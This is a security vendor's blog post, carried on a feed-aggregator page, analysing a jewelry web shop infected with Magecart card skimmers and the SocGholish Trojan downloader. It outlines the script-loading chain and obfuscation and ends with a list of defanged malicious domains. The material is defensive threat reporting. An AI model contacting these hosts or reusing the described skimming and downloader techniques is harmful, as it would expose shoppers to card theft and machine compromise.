惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
Microsoft Security Blog
Microsoft Security Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
V
Visual Studio Blog
宝玉的分享
宝玉的分享
IT之家
IT之家
人人都是产品经理
人人都是产品经理
T
The Blog of Author Tim Ferriss
I
InfoQ
B
Blog RSS Feed
T
Threatpost
博客园_首页
M
MIT News - Artificial intelligence
Spread Privacy
Spread Privacy
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Know Your Adversary
Know Your Adversary
U
Unit 42
Engineering at Meta
Engineering at Meta
C
Cyber Attacks, Cyber Crime and Cyber Security
月光博客
月光博客
Scott Helme
Scott Helme
T
Tor Project blog
有赞技术团队
有赞技术团队
AWS News Blog
AWS News Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Last Week in AI
Last Week in AI
S
Schneier on Security
Vercel News
Vercel News
博客园 - Franky
C
Cybersecurity and Infrastructure Security Agency CISA
L
LINUX DO - 热门话题
NISL@THU
NISL@THU
L
LangChain Blog
爱范儿
爱范儿
Google DeepMind News
Google DeepMind News
The GitHub Blog
The GitHub Blog
雷峰网
雷峰网
Latest news
Latest news
C
CXSECURITY Database RSS Feed - CXSecurity.com
Hugging Face - Blog
Hugging Face - Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
www.infosecurity-magazine.com
www.infosecurity-magazine.com
G
GRAHAM CLULEY
S
Security Affairs
A
About on SuperTechFans
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
大猫的无限游戏
大猫的无限游戏
W
WeLiveSecurity
Cisco Talos Blog
Cisco Talos Blog
罗磊的独立博客

Threat Walkthroughs – ThreatDown by Malwarebytes

Fake Booking.com emails target hotels Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials USB worms: Still wriggling on to under-protected computers after all these years Analyzing a Mispadu Trojan’s attack chain How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes Clipboard hijacker tries to install a Trojan A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
Web shop spreads SocGolish malware and steals credit cards
Pieter Arntz · 2025-01-15 · via Threat Walkthroughs – ThreatDown by Malwarebytes
Ring

A web shop selling jewelry was found with code belonging to two web skimmers and the SocGolish Trojan downloader.

Something that people often overlook when they think about malware is that a vulnerable machine doesn’t stop being vulnerable after it’s been infected, and so it may be compromised in more than one way.

We recently found an example of this while visiting a US jewelry website—we noticed a couple of alerts about blocked domains that triggered our interest because they were completely unrelated to each other, suggesting multiple infections. (We have reached out to the websites affected in this story.)

We recognized one as a SocGolish middlewear domain and the other as a Magecart credit card skimmer. Not a nice combo to present your customers with, if you ask me.

Let’s dig in.

This is the malicious traffic our research revealed:

Malicious traffic from one web store
Traffic to two credit card skimmers and SocGholish

The domain javalibraryeuro[.]com has been on our radar since October 2024, for acting as a command and control (C2) server for a Magecart campaign.

Magecart is a notorious cybercriminal group known for its credit card skimming attacks on e-commerce websites. Its main technique is to inject malicious JavaScript code into targeted websites, often by compromising third-party services the sites use.

The domain tapisroulantstore[.]it is a legitimate site, but the JavaScript hosted there does not even try to hide what it does:

Credit card skimmer code
Credit card skimmer code

SocGholish

While falling victim to credit card skimmers is bad enough on its own, getting your system infected with SocGholish is another level of dangerous.

SocGholish is a sophisticated JavaScript malware framework that has been actively used by cybercriminals since at least 2017. It tricks users into running a script supposedly meant to update their browser. What it actually does is infect the machine and send the details back to a human operator, who can decide how best to monetize it.

A typical SocGholish lure.
A typical SocGholish lure to get people to install malware

In this case, SocGholish is not hosted directly on the website but takes a few steps to the actual malicious code. In the traffic analysis, you can see monsterpword[.]com/assets/table.js script is loaded, which itself loads another script from yet another URL, dashnex.plexusmarket[.]fund, a domain we’ve been blocking since November 2024.

JavaScript code that loads another malicious JavaScript file.
JavaScript code that loads another malicious JavaScript file.

The script from dashnex.plexusmarket[.]fund is highly obfuscated, but after a cleanup it looks like this:

Cleaned up SocGholish code
Cleaned up SocGholish code

The decodeBase64 function decodes a Base64-encoded string. It uses a character set to map characters to their respective indices and constructs the original string from the decoded bytes.

The processData function takes the decoded data and a key, then performs a simple XOR operation character by character to encrypt or decrypt the data.

Since SocGolish is basically a Trojan downloader, its human operator can use it to download whatever malware will best monetize the compromised machine. It could be used to download an information stealer, or if the victim is deemed important enough, ransomware.

How a bit of shopping while using a company computer led to a full-blown ransomware attack is not something you want to have to explain to your boss or IT team.

IOcs

The malicious domains mentioned in this blog post are all blocked by ThreatDown and Malwarebytes web protection modules:

javalibraryeuro[.]com

monsterpword[.]com

dashnex.plexusmarket[.]fund